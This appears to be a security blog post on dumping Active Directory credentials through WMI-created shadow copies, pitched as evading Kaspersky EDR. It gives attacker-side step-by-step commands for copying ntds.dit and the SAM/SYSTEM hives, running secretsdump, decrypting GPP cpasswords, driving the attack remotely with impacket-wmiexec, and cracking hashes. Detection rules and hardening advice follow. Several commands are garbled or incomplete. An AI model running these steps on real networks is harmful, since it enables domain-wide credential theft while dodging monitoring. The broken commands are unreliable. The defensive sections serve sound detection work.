Silent Raid: How Abusing WMI Shadow Copies Silently Bypasses Kaspersky EDR and Dumps AD Credentials + Video

By /

Listen to this Post

Featured Image

Introduction:

Traditional credential dumping techniques like LSASS memory extraction, DCSync, and registry hive harvesting are noisy and easily flagged by modern EDR solutions. By leveraging Windows Management Instrumentation (WMI) to create a shadow copy of the entire system volume, attackers can silently access sensitive files—including the NTDS.dit database, SYSVOL policies, and registry hives—without triggering common EDR hooks.

Learning Objectives:

  • Understand how WMI-based shadow copy creation enables stealthy volume access and bypasses EDR monitoring.
  • Learn step-by-step commands to create, mount, and extract credentials from shadow copies using native Windows tools.
  • Implement detection rules and hardening measures to defend against shadow copy abuse in Active Directory environments.

You Should Know:

  1. The WMI Shadow Copy Technique: A Quiet Alternative to LSASS

Instead of targeting LSASS.exe (which EDRs heavily instrument), this method abuses WMI to create a read‑only point‑in‑time snapshot of the `C:` volume. The shadow copy can then be accessed as a regular drive letter, allowing direct file reads without touching live process memory.

Step‑by‑step guide (attacker perspective, Windows 10/Server 2016+):

1. Create a shadow copy using WMIC:

wmic shadowcopy call create Volume=C:\

Record the returned `ShadowID` or the device path (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1).

2. Verify the shadow copy exists:

vssadmin list shadows

Or with PowerShell:

Get-WmiObject -Class Win32_ShadowCopy | Select-Object VolumeName, InstallDate, DeviceObject
  1. Access sensitive files directly from the shadow copy: 
    copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SAM C:\temp\SAM

    The NTDS.dit file is locked on the live system, but the shadow copy bypasses this lock.

4. Extract credentials offline:

 Using impacket-secretsdump on Linux
impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes LM:NTLM LOCAL

Why it evades EDR: Most EDRs monitor `lsass.exe` memory access, `MiniDumpWriteDump` API calls, and known credential dumping tools. Direct file reads from a shadow copy appear as normal backup operations and are rarely flagged unless custom rules exist.

  1. Extracting Credentials from SYSVOL and Group Policy Preferences

Beyond the NTDS.dit file, shadow copies grant access to `SYSVOL` – the domain‑wide share containing Group Policy Objects (GPOs). Older policies often embed `cpassword` fields for local admin accounts, which use a known static AES key.

Step‑by‑step extraction guide:

  1. Mount the shadow copy as a drive letter (requires admin privileges): 
    mklink /D C:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

Or use `vshadow.exe` from the Windows SDK.

2. Locate Groups.xml files inside SYSVOL:

dir /s C:\shadowcopy\Windows\SYSVOL\domain\Policies.xml

3. Find the `cpassword` field:

<Properties ... cpassword="t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6" ... />

4. Decrypt using `gpp-decrypt` (Kali Linux) or PowerShell:

 PowerShell one-liner (static key)
$cpassword = "t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6"

On Linux:

gpp-decrypt t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6

Note: Modern Windows versions (2016+) no longer store cpassword by default, but many legacy GPOs remain vulnerable. The real value lies in accessing SYSVOL for scripts, scheduled tasks, and other misconfigurations.

  1. Bypassing EDR: Why Shadow Copies Evade Traditional Hooks

Kaspersky EDR and similar products typically hook processes like lsass.exe, wmiPrvSE.exe, and common tools (mimikatz, procdump). The WMI shadow copy technique operates at the filesystem driver level – the shadow copy device is a volume, not a process. When you copy `ntds.dit` from the shadow path, the read operations go through `ntfs.sys` and volsnap.sys, which are legitimate system drivers rarely monitored for anomalous reads.

To simulate the evasion in a lab:

  1. Deploy a Windows Server 2019 with Kaspersky EDR (trial mode).
  2. Run the WMIC shadow copy command – EDR logs a generic WMI event but no alert.
  3. Copy `ntds.dit` via the shadow path – no LSASS access, no alert.
  4. Only post‑exploitation (e.g., `secretsdump` network traffic) might trigger, but the dump itself is already exfiltrated.

What EDR would normally see:

– `mimikatz.exe` → `sekurlsa::logonpasswords` → alert.
– `procdump.exe -ma lsass.exe` → alert.

What remains invisible: `wmic shadowcopy call create` followed by `copy` commands – often logged but not correlated into a high‑severity alert.

4. Linux Alternative: Using Impacket and Remote WMI

Attackers often operate from a Kali Linux machine. Impacket’s `wmiexec.py` can remotely create shadow copies and retrieve files without ever touching the target’s disk interactively.

Step‑by‑step remote attack using Impacket:

1. Install impacket:

pip3 install impacket
  1. Create a shadow copy remotely (requires admin credentials): 
    impacket-wmiexec domain/user:password@target_ip 'wmic shadowcopy call create Volume=C:\'

    Capture the output to find the `ShadowCopyID` or device path.

3. List the shadow copy:

impacket-wmiexec domain/user:password@target_ip 'vssadmin list shadows'
  1. Copy ntds.dit from the shadow copy to a network share or local temp: 
    impacket-wmiexec domain/user:password@target_ip 'copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit \target_ip\C$\temp\ntds.dit'

  2. Download the file: Use `impacket-smbclient` or `smbclient` to pull the dump.

Why this is dangerous: The entire attack chain uses only WMI and SMB – both legitimate administrative protocols. No custom malware, no LSASS interaction.

  1. Detection and Hardening: Monitoring for Suspicious WMI and Shadow Copy Activities

Defenders must shift focus from process‑based detection to filesystem and WMI telemetry.

Key Windows Event IDs to monitor:

| Event ID | Source | Description |

|-|–|-|

| 5857 | WMI-Activity | WMI method call (e.g., `Create` on Win32_ShadowCopy) |
| 4688 | Security | Process creation – look for `wmic.exe` or `vssadmin.exe` with `shadowcopy` |
| 5145 | Security | Detailed file share access – detect reads of `ntds.dit` from unexpected paths |
| 1 | Sysmon | Process creation – additionally filter command lines containing `shadowcopy` |

Sysmon configuration snippet to alert on shadow copy creation:

<Sysmon>
<EventFiltering>
<ProcessCreate onmatch="include">
<CommandLine condition="contains">shadowcopy</CommandLine>
<CommandLine condition="contains">wmic</CommandLine>
</ProcessCreate>
</EventFiltering>
</Sysmon>

Mitigation steps for system administrators:

1. Restrict who can create shadow copies:

  • Shadow copies require the SeBackupPrivilege. Remove this privilege from all non‑backup accounts via `secedit` or GPO.
  • Use the `Backup Operators` group sparingly.

2. Disable WMIC entirely if not needed:

 Uninstall WMI command-line tool (Windows 10/11)
dism /online /disable-feature /featurename:WMIC

Or block `wmic.exe` via AppLocker / WDAC.

3. Enable VSS event logging (default is verbose):

wevtutil set-log "Microsoft-Windows-VSS/Operational" /enabled:true /retention:false /maxsize:1073741824

4. Deploy EDR rules for anomalous file reads:

  • Alert when a process reads `ntds.dit` and the process is not ntbackup.exe, vssvc.exe, or a backup agent.
  • Alert when `wmic.exe` calls `Win32_ShadowCopy` followed by a file copy operation.
  1. Cloud and AD Hardening: Protecting SYSVOL and GPOs

Shadow copy abuse is most effective when SYSVOL contains readable credentials. Harden your Active Directory environment:

  • Remove all Group Policy Preferences that store passwords: Use `Get-GPPPassword` (PowerShell) to audit and replace with LAPS or managed service accounts.
  • Enable SYSVOL encryption: Since Windows Server 2016, `SYSVOL` can be replicated with DFS‑R and encrypted via SMB encryption. 
    Set-SmbShare -Name SYSVOL -EncryptData $true
  • Deploy Local Administrator Password Solution (LAPS): LAPS randomizes local admin passwords and stores them in a protected AD attribute, not in GPO cpassword fields.
  • Monitor for unusual access to `\\domain\SYSVOL\` – especially from non‑domain controllers.

Audit command (run on DC):

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Where-Object { $<em>.Message -like "SYSVOL" -and $</em>.Message -like "Groups.xml" }
  1. Hands-On Lab: Simulating the Attack in a Safe Environment

To fully understand the technique, set up a controlled lab:

Requirements:

  • Windows Server 2022 (Domain Controller)
  • Windows 10/11 workstation (joined to domain)
  • Kali Linux (optional for remote attacks)

Lab steps:

  1. On the DC: Create a test domain user and add to `Domain Admins` (for simulation).
  2. On the workstation (or DC): Run the WMIC shadow copy command.
  3. Extract SYSTEM and SAM from the shadow copy: 
    copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
  4. Crack NTLM hashes offline using `john` or hashcat: 
    samdump2 SYSTEM SAM > hashes.txt
john --format=nt hashes.txt
  5. Observe EDR behavior: If you have a trial EDR (e.g., Kaspersky, SentinelOne), note the lack of high‑severity alerts. Only informational logs about WMI activity.

Detection lab: On the same DC, enable Sysmon and custom rules. Repeat the attack and verify that events 5857 and 4688 are captured. Then implement the mitigation (remove `SeBackupPrivilege` from non‑backup accounts) and test again – the attack should fail with “Access denied”.

What Undercode Say:

  • Stealth over noise: Abusing WMI shadow copies proves that the quietest attacks often bypass EDRs by staying within legitimate administrative tools and filesystem drivers.
  • Detection shift required: Defenders must monitor not only process memory but also file read patterns from shadow copy volumes and unusual WMI method calls.
  • No technique is permanent: EDR vendors will eventually add heuristics for shadow copy creation followed by sensitive file reads – but for now, this remains a powerful red team vector.

Prediction:

Within the next 12–18 months, major EDR platforms (including Kaspersky, CrowdStrike, and Microsoft Defender for Endpoint) will introduce specific detections for shadow copy‑based credential access. These will likely involve kernel‑call stack analysis to differentiate backup software from malicious actors, and new event IDs for `ntds.dit` reads from non‑backup processes. However, attackers will adapt by chaining shadow copies with reflective DLL injection or by manipulating VSS writers to impersonate legitimate backup applications. The cat‑and‑mouse game continues, emphasizing the need for layered defense and privilege minimization.

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Mohammad Mashagba – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: